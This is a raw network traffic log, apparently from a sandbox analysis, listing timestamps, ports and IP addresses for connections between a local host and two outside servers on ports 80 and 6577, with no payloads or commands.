Nov 25, 2021 11:28:11.380484104 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380510092 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380516052 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380569935 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380609989 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380623102 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380664110 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:11.380764008 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:11.380810022 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:15.468162060 CET	80	49808	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:15.468383074 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:17.119236946 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:17.160932064 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:17.766285896 CET	49808	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:18.350131989 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.350337982 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.350358963 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.350406885 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.401993990 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.402076006 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.402095079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.402240038 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.402261019 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.402446032 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.402518988 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.402550936 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.402569056 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.402601957 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.402825117 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.403060913 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.403202057 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.403769016 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.403942108 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.461704969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461771011 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461788893 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461806059 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461821079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461837053 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461853027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461869001 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461884975 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461899996 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461915970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.461931944 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.462402105 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.462531090 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.462696075 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.464376926 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.464550972 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.464708090 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.464879036 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.520843029 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.520952940 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.520961046 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.520970106 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.520976067 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.520982027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.520987988 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.520994902 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521001101 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521007061 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521013021 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.521023989 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521030903 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521184921 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.521214008 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521222115 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521229029 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521279097 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521285057 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.521383047 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.522926092 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.523027897 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.523035049 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.523154020 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.523159981 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.523789883 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525130033 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.525139093 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.525157928 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525219917 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525227070 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525233030 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525293112 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.525367975 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525377035 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525382996 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525389910 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525398016 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.525444984 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.525451899 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.525455952 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.525615931 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.525784969 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.551831007 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.552000046 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.552169085 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.572508097 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.572729111 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.572737932 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.572865009 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.572874069 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.572880983 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.652801991 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.652811050 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.652914047 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.652923107 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.652929068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.652935028 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.652941942 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653050900 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653059959 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653065920 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653073072 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653079033 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653084993 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653090954 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653098106 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653107882 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.653121948 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653129101 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653135061 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653141022 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653146982 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653153896 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653156042 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:18.653165102 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.653172016 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.720134974 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.720247030 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.876338005 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:18.926112890 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.025938034 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.026177883 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.026195049 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.026245117 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.026429892 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.083468914 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.083585024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.083592892 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.083600044 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.083606005 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.083677053 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.083786964 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.083796024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.083801031 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.083998919 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.084011078 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.084014893 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.085495949 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.085593939 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.085624933 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.085733891 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.085794926 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.085849047 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.085856915 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.085964918 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.085972071 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.085979939 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.086014986 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.086138010 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.086147070 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.086153030 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.086158991 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.086165905 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.086286068 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.086294889 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.086427927 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.086440086 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.124377966 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.124653101 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.134394884 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.134649038 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.137765884 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137892962 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137902975 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137908936 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137916088 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137922049 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137928009 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137933969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.137947083 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.138144970 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.138284922 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.138294935 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.138453007 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.138520956 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.138528109 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.138534069 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.138540030 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.138639927 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.138647079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.138716936 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.138886929 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.139059067 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.189629078 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.189923048 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.198626995 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198636055 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198642969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198648930 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198654890 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198661089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198667049 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198673010 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198678970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198684931 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198690891 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.198857069 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.198993921 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.241766930 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.241919994 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.242111921 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.255878925 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.255991936 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256000996 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256006956 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256012917 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256019115 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256025076 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256151915 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.256198883 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256206989 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.256314039 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.256325960 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.256330013 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.256458998 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.257124901 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.257226944 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.257283926 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.257343054 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.257452965 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.257653952 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.296603918 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.296827078 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.311091900 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311224937 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311232090 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.311356068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311364889 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311371088 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311377048 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311383009 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311388969 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.311558962 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.311700106 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.367568970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.367753029 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.367762089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.367876053 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.367902040 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.367965937 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.367973089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.367979050 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.367985010 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.368046999 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.421272039 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.421371937 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.421494961 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.421619892 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.466357946 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.641884089 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.691627026 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.790733099 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.791121960 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.791136980 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.791189909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.791392088 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.846457958 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846467018 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846558094 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846642971 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.846673012 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846681118 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846688032 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846811056 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.846841097 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846848965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846856117 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.846981049 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.847121954 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.900854111 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.900862932 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.900965929 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.900974989 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.900980949 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.900986910 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.900994062 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.901081085 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.901096106 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.901283979 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.901297092 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.954099894 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.954108953 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.954221964 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.954231024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.954237938 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.954310894 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.954452991 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.954478025 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.954619884 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:19.954626083 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:19.954989910 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.017962933 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.018074036 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.018081903 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.018089056 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.018176079 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.018204927 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.018215895 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.018223047 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.018373966 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.018513918 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.075520039 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075529099 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075634956 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075644016 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075649977 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075655937 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075663090 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075665951 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.075671911 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.075865030 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.076006889 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:20.138161898 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.138170958 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.138272047 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.138281107 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.138287067 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.138293028 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.138298988 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:20.138304949 CET	6577	49806	193.104.197.85	192.168.11.20
